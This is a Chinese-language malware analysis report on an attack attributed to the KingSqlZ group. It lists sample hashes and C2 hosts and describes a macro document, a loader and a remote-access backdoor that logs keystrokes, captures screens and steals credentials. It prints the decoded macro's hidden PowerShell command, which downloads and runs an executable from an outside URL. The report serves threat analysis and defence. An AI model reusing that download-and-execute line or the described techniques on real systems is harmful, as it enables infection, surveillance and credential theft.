针对KingSqlZ组织一次攻击的分析报告

0x1 IoC

0x1.1 Hash

本次一共截获了两个和KingSqlZ组织有关的可疑样本，其中有一个是一个doc样本，通过使用宏进行文件传播，IOC如下：

• 样本名称：4fb43047463380ae25cb7684433f6a7e4f4b8b1669048291aca20182877a2810.doc
• 样本Hash：4fb43047463380ae25cb7684433f6a7e4f4b8b1669048291aca20182877a2810
• 样本类型：ole文件(带宏)

另外一个是一个PE文件。IOC如下：

• 样本名称：298ee13829733e23557b5f0db3d93768c0665260be17dc9010288d33ca6fe77f.exe
• 样本Hash：298ee13829733e23557b5f0db3d93768c0665260be17dc9010288d33ca6fe77f
• 是否加壳：无壳
• 编译语言：maybe C++ Visual Studio 201x or Asm demo/example [DebuG]

以及这两个样本释放的其他样本的IOC(不包括内存转储):

• 2d69c9a9622b9b812db1833caec237995eedd0dee59ece53bd359e7083023f47
• 9211473ae545a0248b4ef4bb1bea1acffc1ec85ecb42194984266416720a7f73
• c242bfb6aa6d47087d77d25955bd48a5421fb0353049828ec99d44e119874b7a
• 7a01dd19b5a74e7023d19a19065f49fb013c9f0f7fee974d717d46a8369b8e60

0x1.2 C2

• http://www.gestomarket.co/ylqrg54.exe
• asdfwrkhl.warzonedns.com
• linksysdatakeys.se
• 67.228.235.93
• 187.136.91.177
• 187.155.84.184
• 31.13.73.17
• 67.228.235.93
• 31.13.73.23
• 74.86.228.110
• 187.155.84.184
• 69.171.239.11
• 187.155.47.67
• 66.220.147.47
• 31.13.86.1
• 31.13.75.17:2404
• 备注：这些主机本身不具备相关性，因为他们都是由于被该组织渗透成为该组织攻击的跳板

 

0x2 行为分析

名称统一使用Hash的前几个字符加后缀的方式命名。主要操作是远控类木马。

0x3 样本分析

0x3.1 4fb430.doc

是一个doc宏病毒样本，通过使用oledump获取其中的宏代码。

发现宏代码被混淆严重，去混淆结合沙箱的结果推测具体行为如下：

• 宏代码调用cmd，解密其中的十进制数据。
• 接着调用powershell。下载massive.exe

• powershell.exe -w hidden -ep bypass (New-Object System.Net.WebClient).DownloadFile(‘http://www.gestomarket.co/ylqrg54.exe’,$env:temp + ‘massive.exe’);

• 运行massive.exe

0x3.2 massive.exe

首先这个样本是一个C#程序，使用ILSpy查看源代码。

将程序定位到关键的地方。发现这个样本也只是一个外壳程序，用于从攻击跳板上获取攻击代码，然后将其写入我们的内存中，从内存中执行攻击代码，实现了无文件落地，有效规避了查杀。

使用进程替换技术，先创建一个和自身相同的子进程，然后使用进程替换进程，执行我们的攻击代码。但是由于C#不好被调试，所以将其子进程转储得到我们落地的攻击样本如下，命名为DumpFrommassive.exe

0x3.3 DumpFrommassive.exe

创建一个互斥体，然后获取多个API函数地址

接着判断是否是X64系统，然后通过注册表SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName获取系统的版本信息。

当判断是xp系统，就去获取HKEY_CURRENT_USERorigmsc数据，但是分析机器上未发现这样的键。

利用注册表HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem 关闭UAC通知

通过当前的环境变量获取特殊目录的路径

获取目标进程的相关信息包括模块和32/64位进程，这个进程是由于注册表中的数据决定。

由于转储很多静态数据丢失，过于细节的数据没有办法复现。

由于该组织使用渗透的方式，得到多台服务器的控制权，让这些服务器充当此次攻击的跳板机和C2

通过设置键盘钩子的形式，记录键盘输入，和剪切板数据

创建新线程，执行截图

创建新线程进行音视频传输

清空主流浏览器的COOKIE和保存的表单(账户和密码)，这样就可以在用户重新输入密码的时候记录下来。

获取用户名，机器名称，主要是识别作用

关闭数据执行保护DEP

执行后门远控操作，主要的行为有键盘记录，截图，视频，发送数据，联网下载数据，检索服务，创建开启服务，程序执行，傀儡进程，提权关机。

• 提权关机
  
  
• 键盘记录
  
• 发送键盘输入数据
  
• 安装软件信息，并发送
  
• 从Internet上读取可执行的shellcode，并执行
  
• 获取进程列表
  
• 利用管道实现和C2之间的数据交互
  
• 截图
  
• 键盘区域
  
• 删除，清空文件
  
• 清空COOKIE和用户名密码
  
• 音视频
  
  
• 从Internet上下载数据并执行
  
• 获取服务相关信息
  

综上，对此样本定性为后门远控类文件。

0x4.4 298eeexe.exe

• 从http://www.gestomarket.co/hqpi64.exe下载文件，并执行
  

0x4.5 2XC2DF0S.exe

• SHA256为2d69c9a9622b9b812db1833caec237995eedd0dee59ece53bd359e7083023f47，查壳是UPX的壳，ESP拖一下.
  
• 主要使用了SMC技术
  
• 根据动态分析，可以得到样本创建了fyhgzmilgyvvgdu.exe和「开始」菜单程序启动创建fyhgzmilgyvvgdu.eu.url。创建url的目的是实现了fyhgzmilgyvvgdu.exe的自启动
  
  
  
• 创建自身子进程，并进行进程替换
  
  
  
• dump出傀儡进程的PE数据，命名为DumpFrom2d69exe.exe_
  

0x3.6 DumpFrom2d69exe.exe_

• 首先样本会先链接到C2服务器asdfwrkhl.warzonedns.com，当确认链接上asdfwrkhl.warzonedns.com,此时会从C2上接收数据
  
  
• 然后将自身路径写入SOFTWARE_rptls注册表中，但是注意的是这个是从2XC2DF0S.exe转储出来的，所以原始的模块名应该是2XC2DF0S.exe。加载资源文件，然后有个函数是解密shellcode，然后在把加载入内存的资源文件作为参数传入，初步怀疑应该从内存中执行。这样有效避免了查杀。将资源文件命名为Resource.bin
  
  
  
  
• 直接就是一个后门程序的主体框架。主要包括三大类的功能，第一交流通信，第二，下载执行，第三，信息记录，第四，测试退出，第五驻留操作。
  
• 第一：通信交流
  
  
  
• 第二：下载执行，但是由于分析的时候，没有处于攻击窗口期，所以没有办法了解到此次下载的是何种程序，然后加载了一些网络库，运行时库
  
  
  
• 第三：信息记录，主要是键盘记录，和常见的手段一样，使用了钩子技术，截获用户的键盘输入，并记录按键信息，把并发送个C2服务器
  
  
  
  
• 第四：结束退出，也就是，断开连接，终止线程，删除自身
  
  
  
• 第五：驻留操作。包含了释放资源，运行服务，添加用户等
  
  
  
  

0x3.7 Resource.bin

• 释放C:UsershackyAppDataLocalTempdismcore.dll和C:UsershackyAppDataLocalTempellocnak.xml
  
  
• 然后调用C:Windowssystem32pkgmgr.exe，安装安装KB929761更新包，可能目的是排除竞争者
  

0x3.8 dismcore.dll

• 读取SOFTWARE_rptls的值，这个是其实是2XC2DF0S.exe的路径，然后截取去文件名。检查进程列表中是否存在这样的进程，有则关闭，然后在重新创建一个进程即可！
  

 

0x4 yara规则编写

0x5 后记

学习样本分析两年了，从最开始的简单的蠕虫到后来的勒索病毒，再到挖矿病毒，再到现在的APT样本。总结一下，样本分析最重要的是心细和心诚。心细不多说。何谓心诚，心诚则灵。对于样本，我们也需要有敬畏之心，需要刨根问题，也就是说，作为一个合格的病毒分析师，首先你需要判断文件黑白，但能够辨别黑白也只能给你打60分。如何成为一个优秀的病毒分析师?在于刨根问底，在于洞悉原理，不是简单的知道样本执行了什么操作。肉眼看到的仅仅都只是表面现象。就像这个样本那个宏一样，肉眼可见其实释放了一个exe，但是他是怎么释放的呢？你一概不知，这样你可能就失去了一个可靠的情报，或者说你很有可能凭借这过于自信的判断。导致你对这样本的判断是错误的.但是这对于用户来说是致命的。

专科学技术，本科学原理，博硕学辩证。对之于样本分析同，仅仅是懂得辩黑白仅仅就是专科的水平，不屑于言之，若能明晓原理，可达登堂入室之功，最后是辩证，也就是知道为何这样做是可行的，这样做是不可行的，不可行之处在于何处。以上与君共勉。